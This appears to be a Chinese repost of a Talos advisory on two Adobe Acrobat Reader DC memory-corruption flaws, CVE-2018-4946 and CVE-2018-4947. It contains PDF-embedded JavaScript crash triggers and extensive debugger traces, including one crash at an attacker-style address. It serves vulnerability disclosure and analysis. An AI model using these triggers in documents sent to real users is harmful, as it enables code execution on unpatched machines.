标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3000] 作者: 大猪 发表于: [2022-02-25]
本文共 [366] 位读者顶过
一、概述
5月15日,Talos发布了关于Adobe Acrobat Reader DC新发现漏洞的详细信息。Adobe Acrobat Reader是目前最流行、功能最丰富的PDF阅读器,该产品拥有庞大的用户群,是大多数用户系统中的默认PDF阅读器,同时还作为阅读PDF的插件集成到Web浏览器之中。因此,要利用该漏洞,只需要欺骗用户访问恶意网页,或者发送一封特殊构造的电子邮件即可。[出自:jiwo.org]
二、Net.Discovery.queryServices远程执行代码漏洞(CVE-2018-4946)2.1 概述我们使用版本号为2018.009.20044的Adobe Acrobat Reader DC打开PDF文档时,嵌入在PDF文件中的特定JavaScript脚本可能会导致一个指向先前被释放对象的指针重新被使用。如果攻击者利用该漏洞对内存进行操作,可能会导致敏感内存泄漏或任意代码执行的风险。要触发该漏洞,需要被感染用户打开恶意文件或访问恶意网站。 2.2 CVSSv3评分7.1 – CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 2.3 通用弱点枚举(CWE)CWE-416: Use After Free 2.4 漏洞细节Adobe Acrobat Reader DC支持在PDF中嵌入JavaScript脚本,从而允许阅读并使用交互式PDF表单。该功能特性为攻击者提供了精确控制内存布局的能力,使其从另一个攻击面实现攻击行为。在受此漏洞影响的PDF文档中执行下面的JavaScript代码时,可以触发一个UAF条件: try{this.Net.Discovery.queryServices( "", {} ); }catch(e){app.alert(e);}
在启用页堆(Page Heap)的情况下,该行JavaScript代码会导致崩溃: eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0
eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 Annots!PlugInMain+0x9ea60: 520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=???????? 0:000>
被ebx指向的内存会被释放,造成该指针无效,从而导致崩溃。要使用Net.Discovery.queryServices方法需要具有特权,默认情况下对该方法的使用会因安全权限不足而被阻止。但是,如果文档来自于可信的来源,那么该方法就能够被执行,并导致崩溃。为触发崩溃,其中第一个参数需要使用无效的服务名称,可以是一个空的字符串。 0:000> !heap -p -a eax
address 292c2fd0 found in _DPH_HEAP_ROOT @ 191000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 292215b0: 292c2fd0 30 - 292c2000 2000 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77276206 ntdll!RtlDebugAllocateHeap+0x00000030 7723a127 ntdll!RtlpAllocateHeap+0x000000c4 77205950 ntdll!RtlAllocateHeap+0x0000023a 62f8ed43 MSVCR120!malloc+0x00000049 55848b02 Annots!PlugInMain+0x00004c01 55848ab1 Annots!PlugInMain+0x00004bb0 55a4ba1b Annots!PlugInMain+0x00207b1a 558e1e29 Annots!PlugInMain+0x0009df28 558e2308 Annots!PlugInMain+0x0009e407 56b4267d EScript!mozilla::HashBytes+0x0004201b 56b275b6 EScript!mozilla::HashBytes+0x00026f54 56b217c2 EScript!mozilla::HashBytes+0x00021160 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e 56b204fb EScript!mozilla::HashBytes+0x0001fe99 56b20442 EScript!mozilla::HashBytes+0x0001fde0 56b09e18 EScript!mozilla::HashBytes+0x000097b6 56b48697 EScript!mozilla::HashBytes+0x00048035 56b4841a EScript!mozilla::HashBytes+0x00047db8 56b47e8d EScript!mozilla::HashBytes+0x0004782b 56b46d7f EScript!mozilla::HashBytes+0x0004671d 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
我们在存储最终解引用(Dereference)的指针的dword处,设置一个写入访问断点,这样就可以追溯到其来源: 0:000> ba w 4 292c2ffc 0:000> dd 292c2ffc 0:000> g
Breakpoint 6 hit
eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0 eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 Annots!PlugInMain+0x205507: 55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576) 0:000> dd 292c2ffc 292c2ffc 29d26fe0 ???????? ???????? ???????? 0:000> !heap -p -a 29d26fe0 address 29d26fe0 found in _DPH_HEAP_ROOT @ 191000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 2a3221d4: 29d26fe0 1c - 29d26000 2000 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77276206 ntdll!RtlDebugAllocateHeap+0x00000030 7723a127 ntdll!RtlpAllocateHeap+0x000000c4 77205950 ntdll!RtlAllocateHeap+0x0000023a 62f8ed43 MSVCR120!malloc+0x00000049 55848b02 Annots!PlugInMain+0x00004c01 55848ab1 Annots!PlugInMain+0x00004bb0 558e22e7 Annots!PlugInMain+0x0009e3e6 56b4267d EScript!mozilla::HashBytes+0x0004201b 56b275b6 EScript!mozilla::HashBytes+0x00026f54 56b217c2 EScript!mozilla::HashBytes+0x00021160 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e 56b204fb EScript!mozilla::HashBytes+0x0001fe99 56b20442 EScript!mozilla::HashBytes+0x0001fde0 56b09e18 EScript!mozilla::HashBytes+0x000097b6 56b48697 EScript!mozilla::HashBytes+0x00048035 56b4841a EScript!mozilla::HashBytes+0x00047db8 56b47e8d EScript!mozilla::HashBytes+0x0004782b 56b46d7f EScript!mozilla::HashBytes+0x0004671d 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158
这个0x1c内存块随后被释放,但在后面会被重新使用,从而导致崩溃: (c20.5e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0
eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 Annots!PlugInMain+0x9ea60: 558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=???????? 0:000> dd ebx 29d26fe0 ???????? ???????? ???????? ????????
29d26ff0 ???????? ???????? ???????? ????????
29d27000 ???????? ???????? ???????? ????????
29d27010 ???????? ???????? ???????? ????????
29d27020 ???????? ???????? ???????? ????????
29d27030 ???????? ???????? ???????? ????????
29d27040 ???????? ???????? ???????? ????????
29d27050 ???????? ???????? ???????? ????????
在禁用页堆(Page Heap)的情况下,这种指针解引用通常会成功,并且导致进一步的内存损坏(Memory Corruption)。通过适当的内存布局操作,可以对其实现滥用,并实现任意代码执行。 2.5 时间线
2018年1月23日 向厂商提交漏洞 2.6 贡献者该漏洞由思科Talos团队的Aleksandar Nikolic发现。
三、ANFancyAlertImpl远程执行代码漏洞(CVE-2018-4947)3.1 概述我们使用版本号为2018.009.20044的Adobe Acrobat Reader DC打开PDF文档时,嵌入在PDF文件中的特定JavaScript脚本可能会导致一个指向先前被释放对象的指针重新被使用。如果攻击者利用该漏洞对内存进行操作,可能会导致敏感内存泄漏或任意代码执行的风险。要触发该漏洞,需要被感染用户打开恶意文件或访问恶意网站。 3.2 CVSSv3评分6.8 – CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 3.3 通用弱点枚举(CWE)CWE-908: 使用未经初始化的资源 3.4 漏洞细节
Adobe Acrobat Reader DC支持在PDF中嵌入JavaScript脚本,从而允许阅读并使用交互式PDF表单。该功能特性为攻击者提供了精确控制内存布局的能力,使其从另一个攻击面实现攻击行为。 var a = this.Collab.drivers; this.SetRSSMethods( ); this.ANFancyAlertImpl(this);
在调用ANFancyAlertImpl(this)时,将会分配一个内存对象。指向此对象的指针后续会传递给其他函数,但并不会对其进行初始化。这一问题将导致同一内存区域的先前内容未被定义,从而导致内存损坏,最终导致存在任意代码执行的风险。 (660.8f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
DCReaderplug_insAnnots.api
Reader DCReaderplug_insAnnots.api -
eax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0
eip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203 MSVCR120!memcpy+0x2a: 645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi] 0:000> k # ChildEBP RetAddr 00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:ddvctoolscrtcrtw32stringi386memcpy.asm @ 188] WARNING: Stack unwind information not available. Following frames may be wrong. 01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d
02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1
03 001ac770 776412e1 Annots!PlugInMain+0xa4c5
04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0
05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357
06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050
07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3
08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219
09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d
0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb
通过回溯几个函数调用,我们可以发现memcpy参数的来源: 0:000> bp Annots!PluginMain+0x1bd3db b breakpoint 0 redefined 0:000> g Breakpoint 0 hit
eax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8
eip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 Annots!PlugInMain+0x1bd3db: 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae) 0:000> u eip-1 Annots!PlugInMain+0x1bd3da: 776412db 50 push eax
776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)
776412e1 8b4508 mov eax,dword ptr [ebp+8]
776412e4 8be5 mov esp,ebp
776412e6 5d pop ebp
776412e7 c20400 ret 4
776412ea 55 push ebp
776412eb 8bec mov ebp,esp 0:000> dd poi(eax) 26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????
26a5f008 ???????? ???????? ???????? ????????
26a5f018 ???????? ???????? ???????? ????????
26a5f028 ???????? ???????? ???????? ????????
26a5f038 ???????? ???????? ???????? ????????
26a5f048 ???????? ???????? ???????? ????????
26a5f058 ???????? ???????? ???????? ???????? 0:000> !heap -p -a poi(eax) address 26a5efe8 found in
_DPH_HEAP_ROOT @ 61000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
26954750: 26a5efb8 48 - 26a5e000 2000
6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
6326ed43 MSVCR120!malloc+0x00000049 [f:ddvctoolscrtcrtw32heapmalloc.c @ 92]
6326ee1c MSVCR120!operator new+0x0000001d [f:ddvctoolscrtcrtw32heapnew.cpp @ 59]
7748a048 Annots!PlugInMain+0x00006147
7748a00b Annots!PlugInMain+0x0000610a
7748daea Annots!PlugInMain+0x00009be9
774890a1 Annots!PlugInMain+0x000051a0
7748f546 Annots!PlugInMain+0x0000b645
774a5069 Annots!PlugInMain+0x00021168
7763d75e Annots!PlugInMain+0x001b985d
515db634 EScript!mozilla::HashBytes+0x0004afd2
515db51f EScript!mozilla::HashBytes+0x0004aebd
7763d6ab Annots!PlugInMain+0x001b97aa
774a5069 Annots!PlugInMain+0x00021168
7763d75e Annots!PlugInMain+0x001b985d
515db634 EScript!mozilla::HashBytes+0x0004afd2
515db51f EScript!mozilla::HashBytes+0x0004aebd
7763d6ab Annots!PlugInMain+0x001b97aa
774a5069 Annots!PlugInMain+0x00021168
774a4f71 Annots!PlugInMain+0x00021070
7762aaa2 Annots!PlugInMain+0x001a6ba1
7762aad8 Annots!PlugInMain+0x001a6bd7
77626588 Annots!PlugInMain+0x001a2687
7762af80 Annots!PlugInMain+0x001a707f
51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210
515d267d EScript!mozilla::HashBytes+0x0004201b
515b75b6 EScript!mozilla::HashBytes+0x00026f54
515b17c2 EScript!mozilla::HashBytes+0x00021160
515b05f0 EScript!mozilla::HashBytes+0x0001ff8e
在上面的调试日志中,我们在Annots!PluginMain+0x1bd3db处中断,发现eax作为参数传递给函数调用,其指向新分配的和未初始化的缓冲区。在启用页堆(Page Heap)的情况下,分配内存中的内容会被填充为0xc0c0c0c0。 # set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA.... # cdb "c:Program FilesAdobeAcrobat Reader DCReaderAcroRd32.exe" "c:UsersuserDesktopjs_memcpy_min.pdf" Microsoft (R) Windows Debugger Version 10.0.15063.468 X86
Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: "c:Program FilesAdobeAcrobat Reader DCReaderAcroRd32.exe" "c:UsersuserDesktopjs_memcpy_min.pdf" Symbol search path is: srv*
Executable search path is: ModLoad: 013b0000 015d5000 AcroRd32.exe ModLoad: 771b0000 772f2000 ntdll.dll ModLoad: 75d80000 75e55000 C:Windowssystem32kernel32.dll ModLoad: 75340000 7538b000 C:Windowssystem32KERNELBASE.dll ModLoad: 75690000 75759000 C:Windowssystem32USER32.dll ModLoad: 75400000 7544e000 C:Windowssystem32GDI32.dll ModLoad: 75f50000 75f5a000 C:Windowssystem32LPK.dll ModLoad: 75450000 754ed000 C:Windowssystem32USP10.dll ModLoad: 758d0000 7597c000 C:Windowssystem32msvcrt.dll ModLoad: 75f60000 76001000 C:Windowssystem32ADVAPI32.dll ModLoad: 761b0000 761c9000 C:WindowsSYSTEM32sechost.dll ModLoad: 75550000 755f2000 C:Windowssystem32RPCRT4.dll ModLoad: 75a40000 75a97000 C:Windowssystem32SHLWAPI.dll (8b0.3f8): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000
eip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!LdrpDoDebuggerBreak+0x2c: 772505d9 cc int 3 0:000> g ModLoad: 75e60000 75e7f000 C:Windowssystem32IMM32.DLL ModLoad: 753f0000 753f6000 C:Windowssystem32NSI.dll (8b0.3f8): C++ EH exception - code e06d7363 (first chance) ModLoad: 74f60000 74fac000 C:Windowssystem32apphelp.dll ModLoad: 64a70000 64ac1000 c:Program FilesAdobeAcrobat Reader DCReadersqlite.dll (8b0.3f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8
eip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
41414141 ?? ???
启用页堆后的崩溃输出如下: First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for c:Program FilesAdobeAcrobat Reader DCReaderplug_insAnnots.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:Program FilesAdobeAcrobat Reader DCReaderplug_insAnnots.api -
eax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000 eip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 MSVCR120!memcpy+0x2a: 6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi] 0:000> k
ChildEBP RetAddr 0016c6f4 7748e62e MSVCR120!memcpy+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. 0016c71c 7748e5a2 Annots!PlugInMain+0xa72d 0016c744 7748e3c6 Annots!PlugInMain+0xa6a1 0016c754 776412e1 Annots!PlugInMain+0xa4c5 0016c764 774f7258 Annots!PlugInMain+0x1bd3e0 *** WARNING: Unable to verify checksum for c:Program FilesAdobeAcrobat Reader DCReaderplug_insEScript.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:Program FilesAdobeAcrobat Reader DCReaderplug_insEScript.api - 0016c790 515bd6b2 Annots!PlugInMain+0x73357 0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050 0016c830 5159387b EScript!mozilla::HashBytes+0x315d3 0016c8c0 515932df EScript!mozilla::HashBytes+0x3219 0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d 0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb 0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e 0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc 0016c990 515db61f EScript!mozilla::HashBytes+0x31373 0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd 0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd 0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6 0016ca5c 774a4f71 Annots!PlugInMain+0x21168 0016ca9c 7763d663 Annots!PlugInMain+0x21070 0016cadc 774a5069 Annots!PlugInMain+0x1b9762 0016cafc 7763d75e Annots!PlugInMain+0x21168 0016cb2c 515db634 Annots!PlugInMain+0x1b985d
3.5 时间线
2018年1月23日 向厂商提交漏洞; 3.6 贡献者该漏洞由思科Talos团队的Aleksandar Nikolic发现。
四、已知漏洞版本Adobe Acrobat Reader DC 2018.009.20044 |